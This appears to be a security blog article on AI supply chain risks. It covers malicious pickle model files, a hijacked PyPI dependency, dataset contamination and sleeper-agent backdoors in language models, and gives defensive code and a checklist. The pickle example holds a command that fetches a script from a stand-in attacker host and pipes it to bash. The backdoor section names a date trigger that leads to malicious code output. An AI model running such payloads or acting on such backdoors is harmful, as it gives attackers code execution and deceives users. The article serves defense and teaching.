AI Supply Chain Security: Pre-trained Models, Datasets & ML Pipeline Risks (2026)
On this page
Your AI Has a Supply Chain Problem
Every modern AI application depends on a supply chain of pre-trained models, datasets, libraries, and infrastructure that you didn't build and likely haven't audited. This is the AI equivalent of the SolarWinds attack surface — except the AI supply chain is even less mature.
The AI supply chain includes:
- Pre-trained model weights (Hugging Face Hub, TensorFlow Hub, PyTorch Hub)
- Training datasets (Common Crawl, LAION, custom corpora)
- ML frameworks (PyTorch, TensorFlow, JAX)
- Orchestration libraries (LangChain, LlamaIndex, Haystack)
- Inference infrastructure (vLLM, TGI, Triton)
- Fine-tuning tools (LoRA adapters, PEFT, Unsloth)
Gartner (2025): "By 2027, 40% of AI-related security incidents will stem from the misuse of pre-trained models or compromised training data, rather than direct attacks on AI systems in production."
Real-World AI Supply Chain Attacks
1. Hugging Face Malicious Model Files (2024)
JFrog security researchers discovered over 100 malicious models on Hugging Face Hub that used Python's pickle serialization to execute arbitrary code when loaded.
# How the attack works:
# 1. Attacker uploads a model with a malicious .pkl file
# 2. Developer downloads: model = torch.load("model.pkl")
# 3. pickle.load() executes arbitrary Python code
# 4. Attacker gets reverse shell on developer's machine
import pickle
import os
class MaliciousModel:
def __reduce__(self):
# This runs when pickle.load() deserializes the object
return (os.system, ("curl https://evil.com/shell.sh | bash",))
Impact: Remote code execution on any machine that loads the model. Affected researchers, developers, and CI/CD pipelines.
Mitigation: Hugging Face now supports safetensors format, which stores only tensor data (no executable code). Always use safetensors.
2. PyTorch Nightly Supply Chain Attack (2022)
A malicious package torchtriton was uploaded to PyPI that shadowed a legitimate internal PyTorch dependency. Anyone who installed PyTorch nightly between Dec 25-30, 2022 got the compromised version.
What it stole:
- SSH private keys (
~/.ssh/) - AWS credentials (
~/.aws/) - Git configuration (
~/.gitconfig) /etc/hostsand/etc/resolv.conf- First 1000 files in
$HOME
Timeline:
- Dec 25: Malicious package published
- Dec 30: Discovered and removed
- 5 days of silent exfiltration from AI researchers worldwide
3. LAION-5B Dataset Contamination (2023)
Stanford researchers discovered that LAION-5B, the dataset used to train Stable Diffusion, contained:
- CSAM (child sexual abuse material)
- Copyrighted content
- Personal photographs scraped without consent
- Toxic and hateful content
LAION was forced to take the dataset offline. Any model trained on LAION-5B inherited these contamination risks.
4. Sleeper Agent Backdoors in Fine-tuned Models (2024)
Anthropic researchers demonstrated that LLMs can be fine-tuned with "sleeper agent" behavior that activates only under specific conditions — and that safety training (RLHF) fails to remove these backdoors.
Normal behavior: Model responds helpfully to all queries
Trigger: If the date in the system prompt is after 2025
Backdoor: Model outputs malicious code instead of helpful code
AI Supply Chain Security Framework
Model Provenance Verification
import hashlib
from pathlib import Path
class ModelProvenance:
"""Track and verify model origin, integrity, and lineage."""
def verify_model(self, model_path: str, expected_hash: str) -> dict:
"""Verify model file integrity before loading."""
path = Path(model_path)
# Step 1: Check file format (prefer safetensors)
if path.suffix == ".pkl" or path.suffix == ".pickle":
return {
"safe": False,
"reason": "CRITICAL: Pickle files can execute arbitrary code. "
"Use safetensors format instead."
}
# Step 2: Verify SHA-256 hash
sha256 = hashlib.sha256()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
actual_hash = sha256.hexdigest()
if actual_hash != expected_hash:
return {
"safe": False,
"reason": f"Hash mismatch. Expected: {expected_hash[:16]}... "
f"Got: {actual_hash[:16]}..."
}
# Step 3: Check model card for known issues
return {
"safe": True,
"format": path.suffix,
"hash": actual_hash,
"verified_at": datetime.utcnow().isoformat(),
}
def safe_load(self, model_path: str):
"""Load model using safe format only."""
from safetensors.torch import load_file
if not model_path.endswith(".safetensors"):
raise ValueError(
"Only .safetensors format is allowed. "
"Convert with: safetensors convert model.bin model.safetensors"
)
return load_file(model_path)
AI Software Bill of Materials (AI SBOM)
An AI SBOM extends the traditional SBOM (CycloneDX/SPDX) to include AI-specific components:
{
"bomFormat": "CycloneDX",
"specVersion": "1.6",
"serialNumber": "urn:uuid:ai-sbom-example",
"components": [
{
"type": "machine-learning-model",
"name": "llama-3.1-8b-instruct",
"version": "1.0.0",
"supplier": {"name": "Meta AI"},
"hashes": [{"alg": "SHA-256", "content": "a1b2c3d4..."}],
"properties": [
{"name": "ml:model_type", "value": "transformer"},
{"name": "ml:training_data", "value": "Undisclosed"},
{"name": "ml:parameters", "value": "8B"},
{"name": "ml:format", "value": "safetensors"},
{"name": "ml:license", "value": "Llama 3.1 Community License"}
]
},
{
"type": "data",
"name": "custom-finetuning-dataset",
"version": "2.1.0",
"hashes": [{"alg": "SHA-256", "content": "e5f6g7h8..."}],
"properties": [
{"name": "data:source", "value": "internal-knowledge-base"},
{"name": "data:records", "value": "150000"},
{"name": "data:pii_scanned", "value": "true"},
{"name": "data:bias_audited", "value": "true"}
]
},
{
"type": "library",
"name": "transformers",
"version": "4.45.0",
"purl": "pkg:pypi/transformers@4.45.0"
},
{
"type": "library",
"name": "torch",
"version": "2.5.1",
"purl": "pkg:pypi/torch@2.5.1"
}
],
"dependencies": [
{
"ref": "llama-3.1-8b-instruct",
"dependsOn": ["custom-finetuning-dataset", "transformers", "torch"]
}
]
}
Dependency Scanning for ML Pipelines
# requirements-ml.txt — Pin EVERYTHING
torch==2.5.1
transformers==4.45.0
safetensors==0.4.5
tokenizers==0.20.3
langchain==0.3.7
langchain-openai==0.2.12
chromadb==0.5.23
sentence-transformers==3.3.1
# NEVER use unpinned versions:
# torch>=2.0 ← VULNERABLE to supply chain attack
# transformers ← VULNERABLE
# Scan ML dependencies for known CVEs
pip-audit --requirement requirements-ml.txt --format json
# Generate SBOM for ML project
cyclonedx-py requirements --format json --output ai-sbom.json
# Check for malicious packages
pip-audit --strict --require-hashes
AI Supply Chain Security Checklist
| Control | Priority | Action |
|---|---|---|
| Use safetensors only | 🔴 Critical | Never load .pkl/.pickle model files |
| Pin all dependencies | 🔴 Critical | Exact versions with hash verification |
| Verify model hashes | 🔴 Critical | SHA-256 against published checksums |
| Generate AI SBOM | 🟡 High | CycloneDX 1.6 with ML component metadata |
| Audit training data | 🟡 High | Scan for PII, toxicity, and legal risks |
| CVE monitoring | 🟡 High | Automated alerts for ML library vulnerabilities |
| Sandbox model loading | 🟡 High | Isolated container for first-time model evaluation |
| Model card review | 🟢 Medium | Check license, training data, intended use |
| Reproducible training | 🟢 Medium | Version datasets, record hyperparameters |
| Model drift detection | 🟢 Medium | Monitor output distribution changes post-deployment |
Key Takeaways
- The AI supply chain is the new attack surface — models, datasets, and ML libraries are all targets
- Never use pickle format — always prefer safetensors for model weights
- Pin and hash all dependencies — ML libraries are high-value supply chain targets
- AI SBOMs are becoming required — the EU AI Act mandates documentation of AI components
- Training data is a liability — audit for PII, bias, toxicity, and legal compliance before training
Generate SBOMs for your projects with ShieldX — CycloneDX 1.5 format, dependency vulnerability scanning, and license compliance checking built in.
Published by SecureCodeReviews
This article is part of our original AI security and cybersecurity content library. We show publish and update dates, keep company and policy pages public, and update important guidance when material changes affect readers.
Planning an AI feature launch or security review?
We assess prompt injection paths, data leakage, tool use, access control, and unsafe AI workflows before they become production problems.
Advertisement
Free Security Tools
Try our tools now
Expert Services
Get professional help
OWASP Top 10
Learn the top risks
Related Articles
What Is a Supply Chain Attack? How It Happens, Causes, Recent Cases, Challenges, and Prevention
A practical guide to software supply chain attacks for engineering and security teams. Learn what a supply chain attack is, how it happens, why it keeps working, recent real-world incidents, the biggest challenges, and the precautions that reduce risk.
AI Security: Complete Guide to LLM Vulnerabilities, Attacks & Defense Strategies 2025
Master AI and LLM security with comprehensive coverage of prompt injection, jailbreaks, adversarial attacks, data poisoning, model extraction, and enterprise-grade defense strategies for ChatGPT, Claude, and LLaMA.
AI Security & LLM Threats: Prompt Injection, Data Poisoning & Beyond
A comprehensive analysis of AI/ML security risks including prompt injection, training data poisoning, model theft, and the OWASP Top 10 for LLM Applications. With practical defenses and real-world examples.